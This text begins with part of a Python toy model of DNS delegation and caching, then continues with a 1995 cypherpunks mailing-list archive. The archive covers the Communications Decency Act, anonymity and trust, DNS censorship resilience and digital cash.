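        self.now = 0                    # logical clock

    def tick(self, steps=1):
        self.now += steps

    def _start_zone(self, host):
        """Deepest unexpired cached zone covering host, else the root."""
        best = self.root
        for zname, (zone, expires) in self.cache.items():
            if covers(zname, host) and expires > self.now and len(zname) > len(best.name):
                best = zone
        return best

    def resolve(self, host):
        """Return (ip_or_None, sources consulted in order)."""
        host = host.rstrip(".").lower()
        if host in self.hosts:
            return self.hosts[host], ["hosts"]
        zone, path = self._start_zone(host), []
        while True:
            path.append(zone.name or ".")
            if host in zone.addresses:
                return zone.addresses[host], path
            referral = zone.referral_for(host)
            if referral is None:
                return None, path       # nobody above will point us further down
            zone, ttl = referral
            self.cache[zone.name] = (zone, self.now + ttl)


def drop_delegation(parent, child_name):
    """Model a parent zone removing its referral to a child zone."""
    parent.delegations.pop(child_name, None)


def build_tree():
    """Root -> {com -> tandem.com, org -> c2.org}; returns (root, com, org)."""
    root, com, org = Zone(""), Zone("com"), Zone("org")
    tandem, c2 = Zone("tandem.com"), Zone("c2.org")
    tandem.addresses["mpd.tandem.com"] = "192.0.2.20"   # constructed address
    c2.addresses["c2.org"] = "192.0.2.10"               # constructed address
    root.delegate(com)
    root.delegate(org)
    com.delegate(tandem)
    org.delegate(c2)
    return root, com, org


if __name__ == "__main__":
    root, com, org = build_tree()
    r = Resolver(root)
    print("normal lookup:      ", r.resolve("c2.org"))
    drop_delegation(root, "org")
    print("dropped, cached:    ", r.resolve("c2.org"))
    r.tick(2)
    print("dropped, cache gone:", r.resolve("c2.org"))
    print("hosts file entry:   ", Resolver(root, {"c2.org": "192.0.2.10"}).resolve("c2.org"))
    alt_root = Zone("")
    alt_root.delegate(org)
    print("alternate root:     ", Resolver(alt_root).resolve("c2.org"))
```

In this model the lookup for c2.org never consults the com servers, so only the root's own referral to org (or a cached copy of it) decides whether the name resolves.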




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Fri, 3 Nov 1995 09:23:41 +0800
To: beeson@aclu.org
Subject: Organizations Needed to Sign Letter Against Online Censorship
Message-ID: <951102140740_10830594@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



CYBER-LIBERTIES ALERT!!!        November 2, 1995 
 
from: 
American Civil Liberties Union 
People for the American Way 
 
ORGANIZATIONS NEEDED TO SUPPORT FREE SPEECH IN CYBERSPACE 
 
SIGN THE LETTER BELOW TO OPPOSE FEDERAL ONLINE INDECENCY LEGISLATION! 
 
A conference committee of House and Senate members is now meeting to
determine the future of free speech in cyberspace.  As most of you know,
the House and Senate have now passed two different versions of the
telecommunications bill that would each outlaw "indecent" speech over the
Internet and other online services. 
 
The conference committee now has the power to remove the online indecency 
provisions and to respect the philosophy overwhelmingly approved by the
House in their 420-4 vote in favor of the Cox/Wyden Amendment -- online
users, not government, should determine what online content is appropriate
for themselves and their families. 
 
Groups like the Christian Coalition are contacting the Conference Committee
to urge even stricter criminal provisions for cyberspace than those
contained in the current telecommunications provisions.  Organizations
dedicated to free speech must counter that movement with a groundswell of
opposition to government control over online content. 
 
THIS MAY BE YOUR LAST CHANCE TO STOP UNCONSTITUTIONAL RESTRICTIONS ON YOUR
RIGHT TO FREE SPEECH IN CYBERSPACE. 
 
Please sign your organization on to the letter below.  To sign on, send an
e-mail with your organization's name, address, phone number, and e-mail
address to: 
 
Jill Lesser 
People for the American Way 
jlesser@pfaw.org 
 
The deadline for signatures is MONDAY, NOVEMBER 6, 1995, at 5 p.m. 
 
(Due to time constraints, we regret that we are unable to accept further
revisions to the letter.) 
 
------------------------ 
INDIVIDUAL USERS!!! 
 
It is also essential that the Conference Committee hear from individual
online users who are fundamentally opposed to these draconian speech crimes
for cyberspace.  Be sure to watch the Net for an action alert within the
next 24 hours on how to voice your opposition to the Conferees. 
 
------------------------ 
LETTER FROM ORGANIZATIONS OPPOSED TO 
FEDERAL ONLINE INDECENCY LEGISLATION 
 
November ___, 1995 
 
The Honorable Thomas J. Bliley Jr. 
Chairman, Committee on Commerce 
United States House of Representatives 
Washington, DC 20515 
 
The Honorable Larry Pressler 
Chairman, Committee on Commerce, 
Science and Transportation 
United States Senate    
Washington, DC 20510 
 
Re:  Parental Empowerment and Free Expression in Cyberspace 
 
Dear Chairmen Bliley and Pressler: 
 
We write on behalf of a diverse coalition of non-profit civil liberties,
education, library, cultural, arts, labor and other civic organizations,
and commercial producers and distributors of entertainment, information,
journalism, and art, to express our strong belief that the Communications
Decency Act (CDA) (also known as the "Exon Amendment"), sections 401 to 408
of S. 652, is unconstitutional, unworkable and unwise.  We also strongly
believe that language added to HR 1555, (section 403) amending the federal
criminal code (the Hyde Amendment) is similarly unacceptable, because it
creates new Exon-like speech crimes, including restricting constitutionally
protected speech, mandating vicarious liability for on-line service
providers and endorsing the violation of privacy rights of individuals. 
 
We urge you to delete from any final telecommunications legislation any
provisions that impose a federal regulatory scheme on online content, hold
online service providers liable for the messages of their customers, censor
online communications in violation of the First Amendment, or encourage the
violation of the privacy of online users.  The CDA and Hyde Amendment
contain an approach and philosophy that almost every member of the House of
Representatives has already expressly rejected in their 420-4 vote in favor
of the Online Family Empowerment provisions offered as an amendment to HR
1555 (section 104) by Representatives Cox (R-CA) and Wyden (D-OR). 
 
The CDA would impose unenforceable and intrusive government regulation on a
newly developing forum for speech and commerce.  While failing to
accomplish its intended goal of protecting children, it would unwisely
impose governmental mandates on content and effectively establish federal
standards for parenting in an online world.  Similarly, the Hyde Amendment
would force online service providers to act as censors of constitutionally
protected speech and to invade the privacy of their users. By creating
unconstitutional standards, passage of the CDA or the Hyde Amendment merely
would assure a decade of expensive litigation and the uncertainty that
inevitably accompanies such lawsuits. 
 
As the Conference Committee begins to consider the question of content
control in the online environment, it must not permit unconstitutional
provisions to remain in the bill.  The Conferees' challenge is to avoid
interfering with private sector development of effective blocking and
screening technologies that empower online users to make personal decisions
about content, to preserve the fundamental freedoms of the First Amendment,
and to protect each individual's right to keep private communications
private. 
 
The undersigned organizations believe that the following principles must be
adhered to in any provision that affects the emerging online environment: 
 
THE FIRST AMENDMENT RIGHTS OF ALL AMERICANS MUST BE PRESERVED. 
 
Any effort to establish federal control over constitutionally protected
speech must be opposed outright.  There are alternative ways to protect
access by children to certain material without infringing on the free
speech rights of adults.  The Supreme Court has repeatedly ruled that
Congress may not impose a blanket ban on constitutionally protected speech.
 Any general restriction on constitutionally protected content must not
only serve a compelling government interest but also must be implemented by
the least restrictive means available. 
 
POLICIES MUST EMPOWER USERS -- INCLUDING PARENTS -- TO MAKE PERSONAL
DECISIONS ABOUT CONTENT. 
 
While most Americans agree that certain material is unsuitable for
children, there certainly is no consensus about precisely what that
material might be.  The right to decide what children should see and hear
is uniquely personal to the family -- government should have no role in
dictating such personal and private matters.  Instead, policies should
encourage and empower individual parents to make decisions about the kinds
of content to which their children should have access. 
 
THERE SHOULD BE NO INCENTIVE FOR GOVERNMENT OR PRIVATE INDUSTRY TO INFRINGE
ON PRIVACY RIGHTS BY READING PRIVATE E-MAIL. 
 
Neither online service providers nor federal regulators should be in the
business of perusing private e-mail for potentially objectionable content. 
The privacy rights in e-mail that Congress recognized in its passage of the
Electronic Communications Privacy Act should not be undercut through  
censorship legislation. 
 
THE ONLINE WORLD MUST OPERATE FREE FROM INTRUSIVE AND UNENFORCEABLE
GOVERNMENT CONTENT REGULATION. 
 
Online service providers and other sectors of the communications industry
already are taking the initiative to develop technologies to permit users
to make choices about the content to which they have access.  
Governmentally imposed standards and mandates are no substitute for the
creativity of the marketplace.  Users are demanding technology that will
preserve the free flow of information, while simultaneously allowing them
to make personal decisions about the content to which they or their
children have access. 
 
CONCLUSION 
 
The undersigned organizations believe that Congress can formulate policies
consistent with its deregulatory approach and consistent with the
Constitution.  We stand ready to work with all members of the Conference
Committee to ensure that the above principles are satisfied. 
 
[The following organizations signed on to a similar letter last summer,
before the House vote on the telecommunications bill.] 
 
Alliance For Community Media 
Alliance for Communications Democracy 
American Arts Alliance 
American Association of Advertising Agencies, Inc. 
American Association of Law Libraries 
American Association of University Professors 
American Civil Liberties Union 
American Communication Association 
American Library Association 
American Society of Journalists and Authors 
Association of American Publishers 
Association of Research Libraries 
Center For Democracy & Technology 
Chicago Computer Society 
Computer Professionals for Social Responsibility 
Council of Literary Magazines and Presses 
Electronic Privacy Information Center 
Feminists for Free Expression 
Freedom to Read Foundation 
Libraries for the Future 
The Literary Network 
Magazine Publishers Association 
Media Access Project 
Media Consortium 
National Assembly of State Arts Agencies 
National Association of Artists Organizations 
National Association of Media Arts & Culture 
National Campaign for Freedom of Expression 
National Coalition Against Censorship 
National Federation of Community Broadcasters 
National Gay & Lesbian Task Force 
National Public Telecomputing Network 
New York City Arts Coalition 
Newspaper Association of America 
Society for Electronic Access 
People For the American Way Action Fund 
Rock Out Censorship 
Theater Communications Group 
Writers Guild of America, East






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 05:15:10 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [FRED] Anonymity and Integrity
In-Reply-To: <9511021110.AA01070@all.net>
Message-ID: <199511021934.OAA22117@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:
> To clarify even further, I seem to recall a posting some months ago from
> an anonymous source declaring a new on-line for-sale forum called the
> Internet Security Newsletter (or some such thing).  The anonymity of the
> poster in the context of asking for money and the fact that one of the
> people who was claimed to be on the board of editors was not, in fact, a
> participant, led to the question of who the person was.  

The poster wasn't actually anonymous, but rather pseudonymous, in that case.
(The pseudonym was the name of the publication, as I recall.)

> It turned out
> that this person had a substantial history of putting forth falsehoods
> as well as other related things that might have been very helpful in
> evaluating the credence of his statements.  It turned out that the
> newsletter was, at least in some sense and without making value
> judgements, legitimate; but the anonymity of the person making the posts
> made it harder to assure the integrity of the statements made, which
> exacerbated the assurance issue. 

It seems to me that the integrity of the statements was rather easily verified
based on the merits of the statements themselves. In particular, one or two
participants in the forum denied the claims made that they were members of
the editorial board.

Granted, some people would have been more inclined to look askance at the
messages if they had known the author's True Name. But as the saying goes,
"past performance is not a guarantee of future results". You can choose to
doubt or believe a message because of the author's past reputation. But
reputation is not a reliable predictor of the integrity of future assertions.
It's a nice psychological crutch, but reliance on a "rational expectation" is
a long way from anything I would call "assurance" or "verification". It
doesn't prove anything. The only acceptable method of assurance I can see is
careful analysis of the propositions posited, and empirical verification of
the facts presented. Leaning on past reputation is accepting an odd form of
Proof by Authority.

As it happened I had never heard of the True Name of the sender, so the
knowledge wasn't useful to me.

> I understand that over time, reputations can be built up for pseudonyms
> (which are not necessarily anonyms) but then, with a pseudonym we might
> reasonably ask what the motive is for hiding the real identity.  
[possible motives...]
> Without knowing the motive, how can we assess the statements? 

By asking yourself if they seem to make sense, checking them against known
facts and beliefs, etc. The same methods, IMHO, that are mainly appropriate
to assess anyone's statements.

> In fact, how can we know that the original pseudonym still
> applies? Someone could kill you and take over your pseudonym, and even
> though we might hear of your death, the pseudonym might continue based
> on your reputation but with another actual source.

Of course, the is-a-person problem has been discussed at great length. 
Digital signatures are as effective for pseudonyms as for anyone else.
The messages we've seen "from Alice de `nonymous" might all have come from
different senders. They exhibit a common tone and style, but that doesn't
assure us of anything. In a sense that makes them more inviting,
since there's always the chance that a third party is attempting a clever
parody or a sly bit of character assassination.

[...]
> It's an interesting concept that each statement should/could be taken on
> its own and evaluated independently of the rest of a person's life
> context, but in my experience, that has serious problems.

In my experience, that's about all I can usually do in network communication.
In principle I _could_ devote scads of time to background investigations of
my correspondents, for all except strongly anonymous and strongly 
pseudonymous parties, but I don't find that approach realistic.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 3 Nov 1995 07:25:00 +0800
To: cypherpunks@toad.com
Subject: LAF_las
Message-ID: <199511021959.OAA07546@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   For we CIA-corn peckers:

   Wash Rag today hangs out Page Oner on the billions wasted on
   armaments based on flawed data by the CIA. It has pointers on
   how the spooks chew the raw spew and hawk oysters upstairs.

   Two, NYPaper chickenshits editorially on the same, clucks
   affirmation of Deutch and US Congress under-oversight.

   Three, contrarily, NYP's Maureen Dowd ridicules the CIA
   macho history of acceptable wickedness in the public
   interest, and hoots at Deutch's "mensch" complicity, saying
   that laughable agencies don't survive godawfully wicked
   Washington. Cackling right on, Mo.


   LAF_las











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Andrew Stevenson <frank@funcom.no>
Date: Thu, 2 Nov 1995 23:20:58 +0800
To: cypherpunks@toad.com
Subject: REQUEST: Win95 password encryption details
In-Reply-To: <199511020642.WAA17156@Networking.Stanford.EDU>
Message-ID: <Pine.SGI.3.91.951102155921.6835A-100000@odin>
MIME-Version: 1.0
Content-Type: text/plain



Can anyone please give pointers to the details of the
.PWL password encryption. Thanks.

	Frank


On Wed, 1 Nov 1995, Rich Graves wrote:
> ..., and someone else later picks up the .PWL files, which are not
> encrypted in a particularly secure way, ...


#include <std/disclaimer.h>
Key fingerprint =  E3 D2 BC AD BE F8 C8 2F  A5 89 1D 2B 67 30 EA 1B
PGP encrypted mail preferred, finger for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 3 Nov 1995 10:49:28 +0800
To: cypherpunks@toad.com
Subject: Anonymity and integrity
In-Reply-To: <199511021934.OAA22117@opine.cs.umass.edu>
Message-ID: <9511022111.AA15199@all.net>
MIME-Version: 1.0
Content-Type: text


Futplex <futplex@pseudonym.com> opines:

... [example was here - saving bandwidth]...

> It seems to me that the integrity of the statements was rather easily verified
> based on the merits of the statements themselves. In particular, one or two
> participants in the forum denied the claims made that they were members of
> the editorial board.
> 
> Granted, some people would have been more inclined to look askance at the
> messages if they had known the author's True Name. But as the saying goes,
> "past performance is not a guarantee of future results". You can choose to
> doubt or believe a message because of the author's past reputation. But
> reputation is not a reliable predictor of the integrity of future assertions.
> It's a nice psychological crutch, but reliance on a "rational expectation" is
> a long way from anything I would call "assurance" or "verification". It
> doesn't prove anything. The only acceptable method of assurance I can see is
> careful analysis of the propositions posited, and empirical verification of
> the facts presented. Leaning on past reputation is accepting an odd form of
> Proof by Authority.

You are correct in stating that it doesn't prove anything, but that, it
seems to me, is universally true.  Nothing you can ever do can prove
absolute integrity.  The issue then comes down to whether you get more
integrity by knowing (or having access to) the full body of information
about a source.  I think you do.

> As it happened I had never heard of the True Name of the sender, so the
> knowledge wasn't useful to me.

But with the name, if you had chosen to, you could have done a great
deal to learn about the history of the individual - through his
published works, the many fine and not so fine things he has done in his
career, etc.  It is the availability of this reference material that
makes the identity that much more useful. 

> > I understand that over time, reputations can be built up for pseudonyms
> > (which are not necessarily anonyms) but then, with a pseudonym we might
> > reasonably ask what the motive is for hiding the real identity.  
> [possible motives...]
> > Without knowing the motive, how can we assess the statements? 
> 
> By asking yourself if they seem to make sense, checking them against known
> facts and beliefs, etc. The same methods, IMHO, that are mainly appropriate
> to assess anyone's statements.

It is interesting that you take this line, especially in a forum where
so many people trust so much that is posted without verifying it.  For
example, who on the cypher punks list verified the posting made by the
people from MIT regarding Java?  Was it simply the trusted MIT name that
caused you to take it on faith?

One of the underlying assumptions of the scientific establishment, and
in fact science itself, is that results be published and verifiable, but
in reality, almost all results are not verified, and even the most
startling results aren't verified before many people begin to place
trust in them.

Example of a relatively quick response to such an assertion was the Cold
Fusion situation a few years ago.  On the other hand, the professor at
the University of Pittsburgh who published results based on faked data
(this is a gross simplification, I know) was widely believed for many
years.

The fact is that, today, there are simply too many results to verify
them all along with the underlying data they depend on, the software
used to generate them, etc.  As a result, we are increasingly left with
trusting the people rather than the results.  Another issue is that the
resources required to reproduce "big science" are not available to most
people.  Has anyone reproduced Adleman's experiments on biological
computation? I know of nobody that has, and would love to do it myself,
but I don't have the necessary equipment.  This is an Earthshaking
result with enormous long-term consequences, and I'm certain it's right
because I agree with the underlying theory and don't see any reason for
anyone to lie about it, but if Nostragnia of the Crydon Republic had
published it anonymously, I would be much more hesitant to accept it
and so would you (all).

> > In fact, how can we know that the original pseudonym still
> > applies? Someone could kill you and take over your pseudonym, and even
> > though we might hear of your death, the pseudonym might continue based
> > on your reputation but with another actual source.
> 
> Of course, the is-a-person problem has been discussed at great length. 
> Digital signatures are as effective for pseudonyms as for anyone else.
> The messages we've seen "from Alice de `nonymous" might all have come from
> different senders. They exhibit a common tone and style, but that doesn't
> assure us of anything. In a sense that makes them more inviting,
> since there's always the chance that a third party is attempting a clever
> parody or a sly bit of character assassination.

The question is not whether the signature is right, but rather, are
there other reasons to believe or not believe - trust or not trust -
etc.  the sender.  The less anonymity, the better this is revealed.

> [...]
> > It's an interesting concept that each statement should/could be taken on
> > its own and evaluated independently of the rest of a person's life
> > context, but in my experience, that has serious problems.
> 
> In my experience, that's about all I can usually do in network communication.
> In principle I _could_ devote scads of time to background investigations of
> my correspondents, for all except strongly anonymous and strongly 
> pseudonymous parties, but I don't find that approach realistic.

The point of non-pseudonyms is that if you want to know you can try to
find out.  If others know additional relevant information and decide to
reveal it, you can tell that much the better.  It also reduces blatant
character assassination (which brings some level of civility) and forces
people to take personal responsibility for what they say and do.  All
of these things, in my opinion, increase integrity.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 09:54:36 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: alt.anonymous.messages considered harmful
In-Reply-To: <199511021625.RAA17800@utopia.hacktic.nl>
Message-ID: <199511022113.QAA23862@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Name Withheld by Request writes:
[re: problems with the Usenet newsgroup model of pseud/anonymous message pools]
> Denial of service attacks could be made somewhat less feasible by
> making the pool accessible as a mailing list and via http.

Mailing lists of course suffer the problem of strictly limited participation.
The web approach might work better, in some future with better privacy-
protecting infrastructure in place. Specifically, if HTTP transactions with
a popular web server were routinely encrypted, then all reasonably long
visits to that site would act as cover traffic for a message pool on that
server. As a bonus, you could have a spiffy form on the web page that
searches the pool for you. 

In any event, the server could log your exploration. This returns us to the
issue of strongly anonymous web proxies. (And we could imagine 
countermeasures, like daemons that search for randomly selected pseudonym tags
to muddy the waters. As Tim might say, lots of issues.)

Also, the mention of "as a mailing list _and_ via http" is significant. Making 
the pool available in multiple forms seems to be an unconditional benefit.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 3 Nov 1995 06:19:20 +0800
To: dreschs@mpd.tandem.com (Sten Drescher)
Subject: Surviving DNS disruption
In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <9511022120.AA15892@all.net>
MIME-Version: 1.0
Content-Type: text


Sten Drescher opined:
> sameer <sameer@c2.org> said:
> 
> >>  Is it?  This is the _one_ thing in the article (is that term giving
> >> it too much legitimacy?) that I thought was barely true.  Whoever
> >> controls the root level DNS servers effectively controls the
> >> Internet.  I postulated a couple of months ago about how the US Govt
> >> might attempt to censor the rest of the world: "Remove
> >> lurid.porno.site.other-country from your DNS system within 72 hours
> >> or we will remove references to your DNS servers from the root level
> >> servers.".  (I also speculated that if the US Govt tried doing this,
> >> that an 'underground' DNS system would form almost immediately.)
> >> 
> 
> s> 	The US govt. doesn't run the root nameservers, nor are all the
> s> root nameservers within US jurisdiction.
> 
> 	Granted, the US Govt doesn't run the US-based root servers.
> But, if an Internet 'Decency' law was passed, they certainly could try
> to threaten the US-based root server maintainers to make the cascading
> threats.  And, as I understand the way DNS resolution works, address
> requests go down to your root domain then up from the other root domain,
> i.e., for me to find out what c2.org's address is, my system requests
> from:
> NS mpd.tandem.com
> NS tandem.com
> NS com
> NS org
> 
> If this is correct, if the com NS has the entry for the org NS, I won't
> be able to resolve those names.  Of course, explicit IP addresses and
> /etc/hosts entries would still work.

We all know that an alternative DNS structure would rapidly appear, and
perhaps even a second US (black) Internet - with links between the old
and new fully automatic and transparent.  However, perhaps a good
cypherpunks project would be to create and test a contingency plan and
start an alternative DNS system in parallel with the government run ones.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 5 Nov 1995 20:08:23 +0800
To: ecm@ai.mit.edu
Subject: e$: 24 Hours
Message-ID: <v02120d00acbedcdd34fe@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

e$: 24 Hours

Yesterday, I had probably the most amazing day I've had in a very
long time. As the day revolved around e$, strong crypto, cryptoanarchy,
Macs and the life on the internet, I thought I would share it with you.

6:00
     Got up before the alarm. Carol, my wife, dropped me off at the gym,
     where I hadn't set foot in about 6 months. Started up yet another
     new exercise program. Did a lot of big muscle stuff, like squats
     and deadlifts -- now I can't climb stairs so well for a while. Shaved
     off yet another unfinished goatee (3rd time in 6 weeks) because I
     had to be presentable in public today.

9:30
     Showed up at the speaker's desk at Infoworld Boston, got
     credentialled and went to find David Fox's session on transaction
     methods. Had some time before, so I ran down to the floor and
     weaseled an Apple Internet guy named Tom Bartlett into shooting a
     picture of me with a QuickTake so that Vinnie Moscaritolo, another
     friend at Apple, wouldn't have a picture of him holding a scrawled
     sign saying "Bob: send me a GIF for this!" on the e$ web-page he's
     building for me at http://www.webstuff.apple.com/~vinnie/Rah/ . I
     had Tom e-mail the GIF to me from the floor, and ran back to
     the session, with 5 minutes to spare.

     The session got about 300 attendees, who listened to presentations
     from Pierre from First Virtual, Cliff from Open Market and Mike
     from Checkfree, and then I got to talk a bit.

     I had never spoken to a convention before, and here I was batting
     cleanup after all the pros pitched their stuff. David Fox introduced
     me as a "Wild Card", and I did my best to help him out. We were running
     late, but after asking them to get up and stretch after sitting
     through 2 hours of dog-and-pony, I asked the audience how many
     people were from Boston, and told them about The Boston
     Society for Digital Commerce and when the meeting was. I then asked
     them how many of them had ever sold a car, and then asked them whether
     they took MasterCard from the buyer, and got a nice laugh.

     I told them that I thought that digital commerce *was* financial
     cryptography, and that most people settling trades on the net were
     just figuring that out. I told them to go out and buy Applied
     Cryptography by Schneier, and Out of Control by Kelly. I told them
     about the difference between certificate-based and book-entry
     transaction systems. I told them about Tim May's idea of
     Crypto-Anarchy, and about the Cypherpunks.

     Finally I asked them to imagine a world where instead of needing to
     enforce copyrights and patents, a developer's code would simply
     refuse to run periodically without a digital receipt saying that
     some specified amount had been paid, to the developer, preferably
     in cash. I told them about Digicash, Mark Twain Bank, and about
     how important that was, even if it was a bumpy first start.

     At question-and-answer time, a guy from Germany asked us about the
     ITARs, regulatory restrictions on international transactions, and
     deutschmark-denominated business. All of the other presenters allowed
     that while that was hard, they had patches or were working on it, and
     that regulations were a problem. I talked about Eric Hughes' idea
     of regulatory arbitrage, how John Gilmore said that the internet saw
     censorship, and by extension arbitrary regulation, as damage, and
     routed around it, and I said that the folks at Mark Twain and
     Digicash had seen this as a problem and set up their system to be
     denominated in one of 5 currencies, including marks.

     I picked up about 10 cards from people who wanted to come to lunch at
     the Boston Society for Digital Commerce. (Plug: The first Tuesday of
     the month at the downtown Harvard Club. This month's speaker is Win Treese
     from Open Market, on how to design systems for digital commerce. E-mail
     me for details.)

     In addition, I saw BSDC member Dave Lash, a real-estate mogul turned
     web-fanatic who told me how to clean up my presentation style for next
     time.

2:00
     After schmoozing, and trying to find a bank to cash a check, I met
     David Fox and his web guy (forgot your name, sorry) on the trade
     floor in front of the Netscape booth, which was about 20% the size
     of the IBM booth, and was blocking the aisles so much that the fire
     marshall was giving them grief for it.

     We then went to see Jim Phillips at Security First Network Bank.
     SFNB is in Atlanta, and while the likes of Citicorp and Chase were
     putting together proprietary, dial-up, bank-by-phone systems, Jim
     went ahead and did his stuff on the web for some ridiculous fraction
     of their costs. They were the only bank there. They had this tiny
     booth way back in the corner, and they were also a fire marshall
     problem. Jim was talking to a guy from California somewhere about
     setting up an account right then and there.

     I told Jim to expect a visit from my anonymous digital signature
     law source "Irwin", (for Irwin Corey, The World's Foremost
     Authority, RIP), who had asked me earlier in the week about SFNB,
     and how to get ahold of them.

     Then, David, who was the original Aldus and Radius distributor in
     Australia before moving here a few years ago, went around lining up
     sponsors for his WWW pre-tradeshow tradeshow which in turn evolved
     out of his tradeshow directory business.

     While we walked around, I talked to David some more about e$pam, my
     idea for building a group of three e$-mail lists (a filtered list of
     other e$-related sources, an unmoderated "watering hole", and a
     newsletter), and we agreed to talk more about it on Friday sometime.

3:00 Cashed a check from my first-ever writing sale, a longish rant
     entitled "The Geodesic Network, OpenDoc, and CyberDog", which
     originally was posted to apple-internet-users, was cross-posted by
     bunches of other people in the Mac world to other e-mail lists all
     over the place, got me fan mail from the likes of Kawasaki, Alsop,
     Petreley, and various Apple Vice Presidents, and was even cited in a
     New Zealand law journal. An editor from InfoWorld bashed it from
     a 20kb rant down to a feature article of about 1300 words, and it
     will appear this Monday in the November 6th issue.

4:00 Went to see a client, who is the CFO for a famous, er, beauty salon,
     with about 50 salons world wide. I sort of core-dumped at him about
     how someday he could e-mail his cash to the home office in
     London every night. He's seen me like this before, so he didn't
     quite think I was from Mars...

5:45 As a lurker on the internet-marketing list, I got invited to a
     party at Bob Metcalfe's 5-story Back Bay townhouse. I had recruited
     Julie Rackliffe, a friend of mine in "Development" at the Computer Museum,
     to come along so I would know at least one person there. When I got
     there, I saw Dave Lash again. Small world.

     Besides the usual groceries, Bob had a big bunch of posterboard on a
     on his dining room table, and another piece of posterboard on his
     fireplace mantle. There were a bunch of questions on the table's poster,
     and one was about winners and losers. I said that digital
     financial certificate underwriters would be the winners, and that
     losers would be companies which depended on large information
     hierarchies. There was a question about anonymity, and I quoted
     Gilmore on network damage again.  On the fireplace mantle was this
     posterboard with an org chart with business-card sized blank boxes
     all over it. One side of the pyramid said "Client", the other side
     said "Server", and so I drew a big cloud off to the side with the
     label "Crypto-Anarchist" in it, and put my card there. A few people
     moved their cards into the cloud. I was rather pleased with myself...

     I went upstairs where I met John Levine, who was in the PBS internet
     special last year, and Margy Levine Young, who wrote "The Internet for
     Windows for Dummies Starter Kit" in a room with a Windows box, a bonded
     ISDN connection and a wall projector. I showed a few people the e$
     web-page, met the author of the refrigerator magnets page, and found
     out that John and Margy were fellow Unitarians, and that Margy's husband
     is the UU webmaster. We're everywhere, we're everywhere.

     I went up to the third floor, where by that time they were serving
     coffee and dessert, and Bob Metcalfe was there recommending desserts
     to people. By that time I was talking to a trust officer at a very
     large institutional trustee bank here in Boston about how to
     underwrite digital cash. This guy was sympathetic because what he
     really wanted to do was chuck it all and go to work for Open Market. I
     told him that the next best thing was to let me come in and evangelize
     his bank a bit. He agreed. Dubiously. Anyway, he wants to come to
     lunch at BSDC, probably to schmooze the Open Market folks.  So while
     I was standing there waiting for coffee, I told Metcalfe about
     getting a feature article into his magazine.  One thing led to
     another, and the next thing I know, we're up another flight of
     stairs, and I'm dumping core again, this time about 10 steps from
     ARP-1, the original ARPANet transponder.  Oh. Metcalfe uses a Mac,
     even though his internet feed is to a Wintel box.

     Metcalfe first starts off with a few coy questions about Phiber
     Optik, and Phil Zimmermann, and he figures out that my interest in
     cryptography is pretty much in its financial implications. So, for the
     better part of half an hour, he's quizzing me about stuff like
     digital cash, digital certificates and financial disintermediation,
     and pretty much the whole geodesic market rant.  He says he likes
     "Mr., Doctor, Doctor, Huber's" stuff, a reference to Huber's
     hypercredentialed resume.  He talked about these crazy people who
     were creating a secondary market in Digicash's beta certificates,
     so I told him about Lucky Green, Rich Lethin and how all of us
     created ecm.

     I told Metcalfe about reputation capital, and, when he talked about
     the evils of anonymity, I talk about how on the net, a key pair *is* your
     identity, and about Tim May's cryptoanarchy stuff.  I told him about
     BSDC and asked about him speaking sometime, but he says he's working
     on a conference and a book, and his wife will kill him if he starts
     making speeches again.  He wanted on the BSDC list, though, so I'm
     going to subscribe him and see what happens. I also said I'd mail him
     the e$ URL.

10:45
     I get home and after telling Carol all about my day, I still can't
     sleep, so I jump on the net and filter cypherpunks for buyinfo, and
     then answer some mail from my college roommate, who found me last
     week.  He's a commander in the Navy who's now flying planes at
     McMurdo Sound in Antarctica.  I shot him back a message and told him
     about the e$ web-page, which he's going to have to sneak into another
     office to look at some other night, ;-), and I told him that I was
     writing this and would send it to him when I was through.

     I still wasn't sleepy, so I plinked on the development version of the
     e$ page with the new picture, and when I was done with that, I read
     news, and, in reply to a comment I posted on soc.culture.alaska (I
     spent middle school in Anchorage), I get a reply from Mr. Pickett, my
     7th and 8th grade science teacher, and my favorite science teacher on
     the whole planet.  Since I had just put a picture on my web-page, I
     put the development page's URL on the message so he could see what I
     looked like now.

1:45
     I finally go to sleep.




Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJkyyfgyLN8bw6ZVAQFVAAP/Xmkp7H28Q/DfRCqMWiYboEo53T84hOIP
n6pM/jjC1XAqf9E1v/i5PRQmCylyoJELEzsq3ET02bs4Wi25tS80dcm6oMHoHtAn
1SFCr6hHGIOxmLPJ+XnKCJgpKZEheLGqsG50ZEos26kQ3O4hD3bjZr5WcEyYFAGi
38i5yTwXR9A=
=fKyZ
-----END PGP SIGNATURE-----

-----------------
